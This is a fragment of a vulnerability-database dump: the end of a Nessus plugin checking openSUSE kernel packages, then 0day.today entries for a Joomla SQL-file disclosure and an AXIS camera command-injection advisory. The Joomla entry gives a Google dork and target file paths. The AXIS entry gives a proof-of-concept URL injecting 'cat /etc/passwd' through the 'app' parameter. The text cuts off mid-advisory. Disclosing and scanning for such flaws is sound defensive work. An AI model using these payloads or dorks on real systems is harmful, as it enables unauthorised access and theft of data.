);\n script_set_attribute(\n attribute:\"see_also\",\n value:\"https://bugzilla.opensuse.org/show_bug.cgi?id=1109665\"\n );\n script_set_attribute(\n attribute:\"see_also\",\n 
value:\"https://bugzilla.opensuse.org/show_bug.cgi?id=1109695\"\n );\n script_set_attribute(\n attribute:\"see_also\",\n value:\"https://bugzilla.opensuse.org/show_bug.cgi?id=1110286\"\n );\n script_set_attribute(\n attribute:\"see_also\",\n value:\"https://bugzilla.opensuse.org/show_bug.cgi?id=1114417\"\n );\n script_set_attribute(\n attribute:\"see_also\",\n value:\"https://bugzilla.opensuse.org/show_bug.cgi?id=1114648\"\n );\n script_set_attribute(\n attribute:\"see_also\",\n value:\"https://bugzilla.opensuse.org/show_bug.cgi?id=1114763\"\n );\n script_set_attribute(\n attribute:\"see_also\",\n value:\"https://bugzilla.opensuse.org/show_bug.cgi?id=1114871\"\n );\n script_set_attribute(\n attribute:\"see_also\",\n value:\"https://bugzilla.opensuse.org/show_bug.cgi?id=1114893\"\n );\n script_set_attribute(\n attribute:\"see_also\",\n value:\"https://bugzilla.opensuse.org/show_bug.cgi?id=1115431\"\n );\n script_set_attribute(\n attribute:\"see_also\",\n value:\"https://bugzilla.opensuse.org/show_bug.cgi?id=1116027\"\n );\n script_set_attribute(\n attribute:\"see_also\",\n value:\"https://bugzilla.opensuse.org/show_bug.cgi?id=1116183\"\n );\n script_set_attribute(\n attribute:\"see_also\",\n value:\"https://bugzilla.opensuse.org/show_bug.cgi?id=1116336\"\n );\n script_set_attribute(\n attribute:\"see_also\",\n value:\"https://bugzilla.opensuse.org/show_bug.cgi?id=1116345\"\n );\n script_set_attribute(\n attribute:\"see_also\",\n value:\"https://bugzilla.opensuse.org/show_bug.cgi?id=1116653\"\n );\n script_set_attribute(\n attribute:\"see_also\",\n value:\"https://bugzilla.opensuse.org/show_bug.cgi?id=1116841\"\n );\n script_set_attribute(\n attribute:\"see_also\",\n value:\"https://bugzilla.opensuse.org/show_bug.cgi?id=1116962\"\n );\n script_set_attribute(\n attribute:\"see_also\",\n value:\"https://bugzilla.opensuse.org/show_bug.cgi?id=1117162\"\n );\n script_set_attribute(\n attribute:\"see_also\",\n 
value:\"https://bugzilla.opensuse.org/show_bug.cgi?id=1117165\"\n );\n script_set_attribute(\n attribute:\"see_also\",\n value:\"https://bugzilla.opensuse.org/show_bug.cgi?id=1117186\"\n );\n script_set_attribute(\n attribute:\"see_also\",\n value:\"https://bugzilla.opensuse.org/show_bug.cgi?id=1118152\"\n );\n script_set_attribute(\n attribute:\"see_also\",\n value:\"https://bugzilla.opensuse.org/show_bug.cgi?id=1118316\"\n );\n script_set_attribute(\n attribute:\"see_also\",\n value:\"https://bugzilla.opensuse.org/show_bug.cgi?id=1118319\"\n );\n script_set_attribute(\n attribute:\"see_also\",\n value:\"https://bugzilla.opensuse.org/show_bug.cgi?id=1118505\"\n );\n script_set_attribute(\n attribute:\"see_also\",\n value:\"https://bugzilla.opensuse.org/show_bug.cgi?id=1118790\"\n );\n script_set_attribute(\n attribute:\"see_also\",\n value:\"https://bugzilla.opensuse.org/show_bug.cgi?id=1118798\"\n );\n script_set_attribute(\n attribute:\"see_also\",\n value:\"https://bugzilla.opensuse.org/show_bug.cgi?id=1118915\"\n );\n script_set_attribute(\n attribute:\"see_also\",\n value:\"https://bugzilla.opensuse.org/show_bug.cgi?id=1118922\"\n );\n script_set_attribute(\n attribute:\"see_also\",\n value:\"https://bugzilla.opensuse.org/show_bug.cgi?id=1118926\"\n );\n script_set_attribute(\n attribute:\"see_also\",\n value:\"https://bugzilla.opensuse.org/show_bug.cgi?id=1118930\"\n );\n script_set_attribute(\n attribute:\"see_also\",\n value:\"https://bugzilla.opensuse.org/show_bug.cgi?id=1118936\"\n );\n script_set_attribute(\n attribute:\"see_also\",\n value:\"https://bugzilla.opensuse.org/show_bug.cgi?id=1119204\"\n );\n script_set_attribute(\n attribute:\"see_also\",\n value:\"https://bugzilla.opensuse.org/show_bug.cgi?id=1119680\"\n );\n script_set_attribute(\n attribute:\"see_also\",\n value:\"https://bugzilla.opensuse.org/show_bug.cgi?id=1119714\"\n );\n script_set_attribute(\n attribute:\"see_also\",\n 
value:\"https://bugzilla.opensuse.org/show_bug.cgi?id=1119877\"\n );\n script_set_attribute(\n attribute:\"see_also\",\n value:\"https://bugzilla.opensuse.org/show_bug.cgi?id=1119946\"\n );\n script_set_attribute(\n attribute:\"see_also\",\n value:\"https://bugzilla.opensuse.org/show_bug.cgi?id=1119967\"\n );\n script_set_attribute(\n attribute:\"see_also\",\n value:\"https://bugzilla.opensuse.org/show_bug.cgi?id=1119970\"\n );\n script_set_attribute(\n attribute:\"see_also\",\n value:\"https://bugzilla.opensuse.org/show_bug.cgi?id=1120046\"\n );\n script_set_attribute(\n attribute:\"see_also\",\n value:\"https://bugzilla.opensuse.org/show_bug.cgi?id=1120722\"\n );\n script_set_attribute(\n attribute:\"see_also\",\n value:\"https://bugzilla.opensuse.org/show_bug.cgi?id=1120743\"\n );\n script_set_attribute(\n attribute:\"see_also\",\n value:\"https://bugzilla.opensuse.org/show_bug.cgi?id=1120758\"\n );\n script_set_attribute(\n attribute:\"see_also\",\n value:\"https://bugzilla.opensuse.org/show_bug.cgi?id=1120902\"\n );\n script_set_attribute(\n attribute:\"see_also\",\n value:\"https://bugzilla.opensuse.org/show_bug.cgi?id=1120950\"\n );\n script_set_attribute(\n attribute:\"see_also\",\n value:\"https://bugzilla.opensuse.org/show_bug.cgi?id=1121239\"\n );\n script_set_attribute(\n attribute:\"see_also\",\n value:\"https://bugzilla.opensuse.org/show_bug.cgi?id=1121240\"\n );\n script_set_attribute(\n attribute:\"see_also\",\n value:\"https://bugzilla.opensuse.org/show_bug.cgi?id=1121241\"\n );\n script_set_attribute(\n attribute:\"see_also\",\n value:\"https://bugzilla.opensuse.org/show_bug.cgi?id=1121242\"\n );\n script_set_attribute(\n attribute:\"see_also\",\n value:\"https://bugzilla.opensuse.org/show_bug.cgi?id=1121275\"\n );\n script_set_attribute(\n attribute:\"see_also\",\n value:\"https://bugzilla.opensuse.org/show_bug.cgi?id=1121621\"\n );\n script_set_attribute(\n attribute:\"see_also\",\n 
value:\"https://bugzilla.opensuse.org/show_bug.cgi?id=1121726\"\n );\n script_set_attribute(\n attribute:\"see_also\",\n value:\"https://bugzilla.opensuse.org/show_bug.cgi?id=1122650\"\n );\n script_set_attribute(\n attribute:\"see_also\",\n value:\"https://bugzilla.opensuse.org/show_bug.cgi?id=1122651\"\n );\n script_set_attribute(\n attribute:\"see_also\",\n value:\"https://bugzilla.opensuse.org/show_bug.cgi?id=1122885\"\n );\n script_set_attribute(\n attribute:\"see_also\",\n value:\"https://bugzilla.opensuse.org/show_bug.cgi?id=1123321\"\n );\n script_set_attribute(\n attribute:\"see_also\",\n value:\"https://bugzilla.opensuse.org/show_bug.cgi?id=1123323\"\n );\n script_set_attribute(\n attribute:\"see_also\",\n value:\"https://bugzilla.opensuse.org/show_bug.cgi?id=1123357\"\n );\n script_set_attribute(\n attribute:\"solution\", \n value:\"Update the affected the Linux Kernel packages.\"\n );\n script_set_cvss_base_vector(\"CVSS2#AV:L/AC:L/Au:N/C:C/I:C/A:C\");\n script_set_cvss_temporal_vector(\"CVSS2#E:POC/RL:OF/RC:C\");\n script_set_cvss3_base_vector(\"CVSS:3.0/AV:L/AC:L/PR:L/UI:N/S:U/C:H/I:H/A:H\");\n script_set_cvss3_temporal_vector(\"CVSS:3.0/E:P/RL:O/RC:C\");\n script_set_attribute(attribute:\"cvss_score_source\", value:\"CVE-2018-9568\");\n script_set_attribute(attribute:\"exploitability_ease\", value:\"Exploits are available\");\n script_set_attribute(attribute:\"exploit_available\", value:\"true\");\n\n script_set_attribute(attribute:\"plugin_type\", value:\"local\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:novell:opensuse:kernel-debug\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:novell:opensuse:kernel-debug-base\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:novell:opensuse:kernel-debug-base-debuginfo\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:novell:opensuse:kernel-debug-debuginfo\");\n script_set_attribute(attribute:\"cpe\", 
value:\"p-cpe:/a:novell:opensuse:kernel-debug-debugsource\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:novell:opensuse:kernel-debug-devel\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:novell:opensuse:kernel-debug-devel-debuginfo\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:novell:opensuse:kernel-default\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:novell:opensuse:kernel-default-base\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:novell:opensuse:kernel-default-base-debuginfo\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:novell:opensuse:kernel-default-debuginfo\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:novell:opensuse:kernel-default-debugsource\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:novell:opensuse:kernel-default-devel\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:novell:opensuse:kernel-devel\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:novell:opensuse:kernel-docs-html\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:novell:opensuse:kernel-docs-pdf\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:novell:opensuse:kernel-macros\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:novell:opensuse:kernel-obs-build\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:novell:opensuse:kernel-obs-build-debugsource\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:novell:opensuse:kernel-obs-qa\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:novell:opensuse:kernel-source\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:novell:opensuse:kernel-source-vanilla\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:novell:opensuse:kernel-syms\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:novell:opensuse:kernel-vanilla\");\n script_set_attribute(attribute:\"cpe\", 
value:\"p-cpe:/a:novell:opensuse:kernel-vanilla-base\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:novell:opensuse:kernel-vanilla-base-debuginfo\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:novell:opensuse:kernel-vanilla-debuginfo\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:novell:opensuse:kernel-vanilla-debugsource\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:novell:opensuse:kernel-vanilla-devel\");\n script_set_attribute(attribute:\"cpe\", value:\"cpe:/o:novell:opensuse:42.3\");\n\n script_set_attribute(attribute:\"vuln_publication_date\", value:\"2018/06/20\");\n script_set_attribute(attribute:\"patch_publication_date\", value:\"2019/02/06\");\n script_set_attribute(attribute:\"plugin_publication_date\", value:\"2019/02/07\");\n script_set_attribute(attribute:\"generated_plugin\", value:\"current\");\n script_end_attributes();\n\n script_category(ACT_GATHER_INFO);\n script_copyright(english:\"This script is Copyright (C) 2019-2021 and is owned by Tenable, Inc. 
or an Affiliate thereof.\");\n script_family(english:\"SuSE Local Security Checks\");\n\n script_dependencies(\"ssh_get_info.nasl\");\n script_require_keys(\"Host/local_checks_enabled\", \"Host/SuSE/release\", \"Host/SuSE/rpm-list\", \"Host/cpu\");\n\n exit(0);\n}\n\n\ninclude(\"audit.inc\");\ninclude(\"global_settings.inc\");\ninclude(\"rpm.inc\");\n\nif (!get_kb_item(\"Host/local_checks_enabled\")) audit(AUDIT_LOCAL_CHECKS_NOT_ENABLED);\nrelease = get_kb_item(\"Host/SuSE/release\");\nif (isnull(release) || release =~ \"^(SLED|SLES)\") audit(AUDIT_OS_NOT, \"openSUSE\");\nif (release !~ \"^(SUSE42\\.3)$\") audit(AUDIT_OS_RELEASE_NOT, \"openSUSE\", \"42.3\", release);\nif (!get_kb_item(\"Host/SuSE/rpm-list\")) audit(AUDIT_PACKAGE_LIST_MISSING);\n\nourarch = get_kb_item(\"Host/cpu\");\nif (!ourarch) audit(AUDIT_UNKNOWN_ARCH);\nif (ourarch !~ \"^(x86_64)$\") audit(AUDIT_ARCH_NOT, \"x86_64\", ourarch);\n\nflag = 0;\n\nif ( rpm_check(release:\"SUSE42.3\", reference:\"kernel-debug-4.4.172-86.1\") ) flag++;\nif ( rpm_check(release:\"SUSE42.3\", reference:\"kernel-debug-base-4.4.172-86.1\") ) flag++;\nif ( rpm_check(release:\"SUSE42.3\", reference:\"kernel-debug-base-debuginfo-4.4.172-86.1\") ) flag++;\nif ( rpm_check(release:\"SUSE42.3\", reference:\"kernel-debug-debuginfo-4.4.172-86.1\") ) flag++;\nif ( rpm_check(release:\"SUSE42.3\", reference:\"kernel-debug-debugsource-4.4.172-86.1\") ) flag++;\nif ( rpm_check(release:\"SUSE42.3\", reference:\"kernel-debug-devel-4.4.172-86.1\") ) flag++;\nif ( rpm_check(release:\"SUSE42.3\", reference:\"kernel-debug-devel-debuginfo-4.4.172-86.1\") ) flag++;\nif ( rpm_check(release:\"SUSE42.3\", reference:\"kernel-default-4.4.172-86.1\") ) flag++;\nif ( rpm_check(release:\"SUSE42.3\", reference:\"kernel-default-base-4.4.172-86.1\") ) flag++;\nif ( rpm_check(release:\"SUSE42.3\", reference:\"kernel-default-base-debuginfo-4.4.172-86.1\") ) flag++;\nif ( rpm_check(release:\"SUSE42.3\", reference:\"kernel-default-debuginfo-4.4.172-86.1\") ) 
flag++;\nif ( rpm_check(release:\"SUSE42.3\", reference:\"kernel-default-debugsource-4.4.172-86.1\") ) flag++;\nif ( rpm_check(release:\"SUSE42.3\", reference:\"kernel-default-devel-4.4.172-86.1\") ) flag++;\nif ( rpm_check(release:\"SUSE42.3\", reference:\"kernel-devel-4.4.172-86.1\") ) flag++;\nif ( rpm_check(release:\"SUSE42.3\", reference:\"kernel-docs-html-4.4.172-86.1\") ) flag++;\nif ( rpm_check(release:\"SUSE42.3\", reference:\"kernel-docs-pdf-4.4.172-86.1\") ) flag++;\nif ( rpm_check(release:\"SUSE42.3\", reference:\"kernel-macros-4.4.172-86.1\") ) flag++;\nif ( rpm_check(release:\"SUSE42.3\", reference:\"kernel-obs-build-4.4.172-86.1\") ) flag++;\nif ( rpm_check(release:\"SUSE42.3\", reference:\"kernel-obs-build-debugsource-4.4.172-86.1\") ) flag++;\nif ( rpm_check(release:\"SUSE42.3\", reference:\"kernel-obs-qa-4.4.172-86.1\") ) flag++;\nif ( rpm_check(release:\"SUSE42.3\", reference:\"kernel-source-4.4.172-86.1\") ) flag++;\nif ( rpm_check(release:\"SUSE42.3\", reference:\"kernel-source-vanilla-4.4.172-86.1\") ) flag++;\nif ( rpm_check(release:\"SUSE42.3\", reference:\"kernel-syms-4.4.172-86.1\") ) flag++;\nif ( rpm_check(release:\"SUSE42.3\", reference:\"kernel-vanilla-4.4.172-86.1\") ) flag++;\nif ( rpm_check(release:\"SUSE42.3\", reference:\"kernel-vanilla-base-4.4.172-86.1\") ) flag++;\nif ( rpm_check(release:\"SUSE42.3\", reference:\"kernel-vanilla-base-debuginfo-4.4.172-86.1\") ) flag++;\nif ( rpm_check(release:\"SUSE42.3\", reference:\"kernel-vanilla-debuginfo-4.4.172-86.1\") ) flag++;\nif ( rpm_check(release:\"SUSE42.3\", reference:\"kernel-vanilla-debugsource-4.4.172-86.1\") ) flag++;\nif ( rpm_check(release:\"SUSE42.3\", reference:\"kernel-vanilla-devel-4.4.172-86.1\") ) flag++;\n\nif (flag)\n{\n if (report_verbosity > 0) security_hole(port:0, extra:rpm_report_get());\n else security_hole(0);\n exit(0);\n}\nelse\n{\n tested = pkg_tests_get();\n if (tested) audit(AUDIT_PACKAGE_NOT_AFFECTED, tested);\n else audit(AUDIT_PACKAGE_NOT_INSTALLED, 
\"kernel-devel / kernel-macros / kernel-source / etc\");\n}\n", "cvss": {"score": 7.2, "vector": "AV:L/AC:L/Au:N/C:C/I:C/A:C"}}], "zdt": [{"lastseen": "2019-01-13T00:37:01", "description": "Joomla com_admin component versions 2.5.4 through 3.7.4 suffer from a database disclosure vulnerability.", "edition": 1, "published": "2018-11-25T00:00:00", "title": "Joomla Admin 3.7.4 Database Disclosure Vulnerability", "type": "zdt", "bulletinFamily": "exploit", "cvelist": [], "modified": "2018-11-25T00:00:00", "id": "1337DAY-ID-31673", "href": "https://0day.today/exploit/description/31673", "sourceData": "#################################################################################################\r\n\r\n# Exploit Title : Joomla com_admin Components from V2.5.4 to V3.7.4\r\nDatabase Backup Arbitrary File Download Vulnerability\r\n# Author [ Discovered By ] : KingSkrupellos from Cyberizm Digital Security\r\nArmy\r\n# Vendor Homepage : joomla.org\r\n+\r\ngithub.com/joomla-projects/gsoc18_override_management/tree/master/administrator/components/com_admin\r\n# Tested On : Windows and Linux\r\n# Category : WebApps\r\n# Version Information : V2.5.4 - V2.5.6 - V2.5.7 - V3.0.0 3.0.1\r\nV3.0. 
V3.0.3 V3.1.0 V3.1.1 V3.1.2 V3.1.3 V3.1.4 V3.1.5 V3.2.0 V3.2.1\r\nV3.4.0 V3.7.4 and if etcetera....\r\n# Google Dorks : inurl:''/administrator/components/com_admin/sql/''\r\n# Exploit Risk : Medium\r\n# CWE : CWE-264 - [ Permissions, Privileges, and Access Controls ]\r\nCWE-23 - [ Relative Path Traversal ] - CWE-200 [ Information Exposure ]\r\n\r\n#################################################################################################\r\n\r\n# Admin Panel Login Path :\r\n\r\n/administrator\r\n\r\n#################################################################################################\r\n\r\n# Exploit :\r\n\r\nCheck this folders =>\r\n\r\n/joomla/administrator/components/com_admin/sql/others/mysql/......\r\n\r\n/PATH/PATH/administrator/components/com_admin/sql/others/mysql/......\r\n\r\n/PATH/administrator/components/com_admin/sql/updates/mysql/......\r\n\r\n/administrator/components/com_admin/sql/updates/mysql/......\r\n\r\n/administrator/components/com_admin/sql/updates/postgresql/.......\r\n\r\n/administrator/components/com_admin/sql/updates/sqlazure/......\r\n\r\n/administrator/components/com_admin/sql/updates/mysql/2.5.4-[YEAR]-[MONTH]-[DAY].sql\r\n\r\n/administrator/components/com_admin/sql/updates/mysql/2.5.4-2012-03-18.sql\r\n\r\n/administrator/components/com_admin/sql/updates/mysql/2.5.4-2012-03-19.sql\r\n\r\n/administrator/components/com_admin/sql/updates/mysql/2.5.5.sql\r\n\r\n/administrator/components/com_admin/sql/updates/mysql/2.5.6.sql\r\n\r\n/administrator/components/com_admin/sql/updates/mysql/2.5.7.sql\r\n\r\n/administrator/components/com_admin/sql/others/mysql/utf8mb4-conversion-01.sql\r\n\r\n/PATH/administrator/components/com_admin/sql/others/mysql/utf8mb4-conversion-02.sql\r\n\r\n/administrator/components/com_admin/sql/updates/sqlazure/2.5.4-[YEAR]-[MONTH]-[DAY].sql\r\n\r\n/administrator/components/com_admin/sql/updates/sqlazure/2.5.4-2012-03-18.sql\r\n\r\n/administrator/components/com_admin/sql/updates/sqlazure/2.5.4-2012-03-19
.sql\r\n\r\n/administrator/components/com_admin/sql/updates/sqlazure/2.5.5.sql\r\n\r\n/administrator/components/com_admin/sql/updates/sqlazure/2.5.6.sql\r\n\r\n/administrator/components/com_admin/sql/updates/sqlazure/2.5.7.sql\r\n\r\n/administrator/components/com_admin/sql/updates/mysql/2.5.[THIS-NUMBER-CHANGES-].sql\r\n\r\n#################################################################################################\r\n\r\n# Example Vulnerable Sites =>\r\n\r\n#################################################################################################\r\n\r\n# Discovered By KingSkrupellos from Cyberizm.Org Digital Security Team\r\n\r\n#################################################################################################\n\n# 0day.today [2019-01-12] #", "cvss": {"score": 0.0, "vector": "NONE"}, "sourceHref": "https://0day.today/exploit/31673"}, {"lastseen": "2018-04-03T13:27:59", "edition": 2, "description": "Exploit for linux platform in category web applications", "published": "2016-07-29T00:00:00", "type": "zdt", "title": "AXIS Multiple Products - Authenticated Remote Command Execution via devtools Vector", "bulletinFamily": "exploit", "cvelist": ["CVE-2015-8257"], "modified": "2016-07-29T00:00:00", "id": "1337DAY-ID-25204", "href": "https://0day.today/exploit/description/25204", "sourceData": "* Advisory Information\r\n++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++\r\n(+) Title: AXIS Multiple Products Authenticated Remote Command Execution via devtools vector\r\n(+) Vendor: AXIS Communications\r\n(+) Research and Advisory: Orwelllabs\r\n(+) Advisory URL: http://www.orwelllabs.com/2016/01/axis-commucations-multiple-products.html\r\n(+) Class: Improper Input Validation [CWE-20]\r\n(+) CVE Name: CVE-2015-8257\r\n(+) Remotely Exploitable: Yes\r\n(+) Locally Exploitable: No\r\n(+) OLSA-ID: OWLL2015-8257\r\n(+) Affected Versions: Multiple Products/Firmwares (check the list bellow)\r\n(+) IoT Attack Surface: Device Administrative Interface/Authentication/Authorization\r\n(+) Owasp IoTTop10: I1, 
I2\r\n++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++\r\n \r\n \r\nVulnerability\r\n+++++++++++++\r\nAXIS Network Cameras (various models/firmwares) are prone to Authenticated remote\r\ncommand execution vulnerability. Exploiting this vulnerability a remote attacker can\r\nforce the execution of certain unauthorized actions, which may lead to further attacks.\r\n \r\nTechnical Details\r\n+++++++++++++++++\r\nThe devtools.sh script is the responsible for vulnerability and it's 4 attack vectors through the following pages:\r\n \r\n \r\nhttp://xxx.xxx.xxx.xxx/app_license.shtml?app=\r\nhttp://xxx.xxx.xxx.xxx/app_license_custom.shtml?app=\r\nhttp://xxx.xxx.xxx.xxx/app_index.shtml?app=\r\nhttp://xxx.xxx.xxx.xxx/app_params.shtml?app=\r\n \r\n \r\nAn attacker can use the app parameter that waits for the name of a\r\nlegitimate application to inject commands in the operating system using\r\n\"%3B\", for example, to read the contents of /etc/passwd:\r\n \r\nhttp: //\r\nxxx.xxx.xxx.xxx/app_license.shtml?app=ORWELLLABS%3Bcat%20/etc/passwd\r\n \r\nThe data entered in parameter \"app =\" is passed without any treatment for\r\ndevtools.sh script located at: {HTMLROOL}/bin/devtools.sh\r\n \r\nThis script contains several functions, namely:\r\n \r\nlist()\r\nstatus()\r\nmenulist()\r\nmainpagelink()\r\nSETTINGSLINK()\r\nconfvariable()\r\necho_ssivar_licensekey()\r\nload_auto_inst_form()\r\n \r\nWhen these functions are invoked, they interact with the parameters passed\r\nby the web application through\r\nthe affected scripts (e.g. ap_license.shtml? App =). 
By injecting the code\r\nbelow:\r\n \r\nhttp: //\r\nxxx.xxx.xxx.xxx/app_license.shtml?app=ORWELLLABS%3Bcat%20/etc/passwd\r\n \r\nThe value passed in \"app\" will be passed directly to the script invoking\r\ndevtools.sh via shell -c as shown in the listing process below (third line\r\ninvoking confvariable function):\r\n \r\n[SNIP]\r\n 2039 led 25472 S /usr/bin/enldgts -n\r\n12014 root 0 SW [kworker/0:0]\r\n13178 root 2548 S /bin/sh -c /usr/html/bin/devtools.sh\r\nconfvariable ORW..\r\n13183 root 2728 R ps -aux PACKAGENAME\r\n13312 root 0 SW [kworker/3:1]\r\n13320 root 0 SW [kworker/2:0]\r\n[SNIP]\r\n \r\nThe value \"ORWELLLABS%3Bcat%20/etc/passwd\" is then passed on to the\r\ncorresponding function (after passing through a conference on \"confvariable\r\n()\").\r\n \r\nconfvariable() {\r\nlocal val=\r\nif [ -r \"$PACKAGE_DIRECTORY/$1/$ADPPACKCFG\" ]; then\r\n. \"$PACKAGE_DIRECTORY/$1/$ADPPACKCFG\" || :\r\neval val=\\$$2\r\necho $val\r\nfi\r\n}\r\n \r\n \r\nThen enter the function \"menulist ()\" which we see the main stretch located\r\nbetween the lines 127 and 143:\r\n \r\n[SNIP]\r\n127 [ \"$ name\", \"/app_params.shtml\", \"app = $ APPNAME &\" hostA, <! - # If\r\nexpr = \"\\ $ activeMenu1 = $ APPNAME\" -> true <! - # Else - -> false <! - #\r\nendif ->, null,\r\n128 [\r\n129 [ \"Settings\", \"/app_params.shtml\", \"app = $ APPNAME &\" hostA, <! - # If\r\nexpr = \"\\ $ ActivePage = param_ $ APPNAME\" -> true <! - # Else - -> false\r\n<! - # endif ->, null, []],\r\n130 EOF\r\n131 if [-z \"$ LICENSEPAGE\"] || [ \"$ LICENSEPAGE\" axis =]; Then\r\n132 cat << - EOF\r\n133 [ \"License\", \"/app_license.shtml\", \"app = $ APPNAME &\" hostA, <! - # If\r\nexpr = \"\\ $ ActivePage = license_ $ APPNAME\" -> true <! - # Else - -> false\r\n<! 
- # endif ->, null, []],\r\n134 EOF\r\n135 fi\r\n136 if [ \"$ LICENSEPAGE\" = custom] && [-r \"$ HTMLROOT / local / $ APPNAME /\r\nlicense.inc\"]; Then\r\n137 cat << - EOF\r\n138 [ \"License\", \"/app_license_custom.shtml\", \"app = $ APPNAME &\" hostA, <!\r\n- # If expr = \"\\ $ ActivePage custom_ = $ APP NAME\" -> true <! - # Else ->\r\nfalse <! - # endif ->, null, []],\r\n139 EOF\r\n140 fi\r\n141 if [-r \"$ HTMLROOT / local / $ APPNAME / about.inc\"]; Then\r\n142 cat << - EOF\r\n143 [ \"About\", \"/app_index.shtml\", \"app = $ APPNAME &\" hostA, <! - # If\r\nexpr = \"\\ $ ActivePage = $ APPNAME\" -> true <! - # Else - > false <! - #\r\nendif ->, null, []],\r\n \r\n \r\nWhere the important lines are the menus below:\r\n \r\n \r\n/bin/devtools.sh (127):\r\n[ \"$ Name\", \"/app_params.shtml\", \"app = $ APPNAME &\" hostA, <! - # If expr\r\n= \"\\ $ activeMenu1 = $ APPNAME\" -> true -> false <! - #endif ->, null,\r\n/bin/devtools.sh (129):\r\n[ \"Settings\", \"/app_params.shtml\", \"app = $ APPNAME &\" hostA, <! - # If\r\nexpr = \"\\ $ ActivePage = param_ -> true <! - # Else -> false < ! - # endif\r\n->, null, []],\r\n/bin/devtools.sh (133):\r\n[ \"License\", \"/app_license.shtml\", \"app = $ APPNAME &\" hostA, <! - # If\r\nexpr = \"\\ $ ActivePage = License\" -> true <! - # Else -> false <! - # endif\r\n->, null, []],\r\n/bin/devtools.sh (138):\r\n[ \"License\", \"/app_license_custom.shtml\", \"app = $ APPNAME &\" hostA, <! - #\r\nIf expr = \"\\ $ ActivePage = APPNAME\" -> true <! - # Else -> false <! - #\r\nendif ->, null, []],\r\n/bin/devtools.sh (143):\r\n[ \"About\", \"/app_index.shtml\", \"app = $ APPNAME &\" hostA, <! - # If expr =\r\n\"\\ $ ActivePage = $ APPNAME\" - # else -> false <! - # endif ->, null, []],\r\n \r\n \r\nIn PoC presented above, the payload will be triggered in line vector 133 of\r\ndevtools script ( \"License\" menu) that will:\r\n \r\n \r\n[ \"License\", \"/app_license.shtml\", \"app = ORWELLLABS% 3Bcat% 20\r\n/etc/passwd& \"HostA, <! 
- # If expr =\" \\ $ ActivePage = License \"-> true <!\r\n- # Else -> false <! - # Endif ->, null, []],\r\n \r\nAnd when executed echoes the results on the page.\r\n \r\n \r\nImpact\r\n++++++\r\nThe impact of this vulnerability is that taking into account the busybox\r\nthat runs behind (and with root privileges everywhere. in all the binaries\r\nand scripts) is possible to execute arbitrary commands, create backdoors,\r\nperforming a reverse connection to the machine attacker, use this devices\r\nas botnets and DDoS amplification methods... the limit is the creativity of\r\nthe attacker.\r\n \r\n \r\nAffected Products\r\n+++++++++++++++++\r\nMultiple Axis Communications Products/Firmware including:\r\n \r\n * AXIS Q6032-E/Q6034-E/Q6035-E PTZ Dome Network Camera -\r\nFirmware 5.41.1.4\r\n * AXIS Q6042-E/Q6044-E/Q6045-E PTZ Dome Network Camera -\r\nFirmware 5.70.1.2\r\n * AXIS A8004-VE Network Video Door Station -\r\nFirmware 5.85.1.1\r\n * AXIS P3384 fixed dome Network camera -\r\nFirmware 6.10.1\r\n * AXIS P5532-E PTZ Dome Network Camera -\r\nFirmware 5.41.3.1\r\n * AXIS Q60-E Network Dome PTZ -\r\nFirmware 5.65.1.1, 5.41.*, 5.70.1.1\r\n * AXIS Q7401 Video Encoder -\r\nFirmware 5.50.4\r\n * AXIS Q7404 Video Encoder -\r\nFirmware 5.50.4.*\r\n * AXIS Q7406 Blade Video Encoder -\r\nFirmware 5.51.2\r\n * AXIS Q7411 Video Encoder -\r\nFirmware 5.90.1\r\n * AXIS Q7414 Blade Video Encoder -\r\nFirmware 5.51.2\r\n * AXIS Q7424-R Video Encoder -\r\nFirmware 5.50.4\r\n * AXIS Q7424-R Mk II Video Encoder -\r\nFirmware 5.51.3\r\n * AXIS Q7436 Blade Video Encoder -\r\nFirmware 5.90.1\r\n \r\n \r\nThe list bellow shows the firmwares affected (and probably these firmwares\r\nare not available anymore, but just the last version of them, if you not\r\nsure, check the hash). All these firmwares (in the second column) has the\r\nsame \"devtools.sh\" shellscript (responsible for trigger the RCE\r\nvulnerability) embedded. 
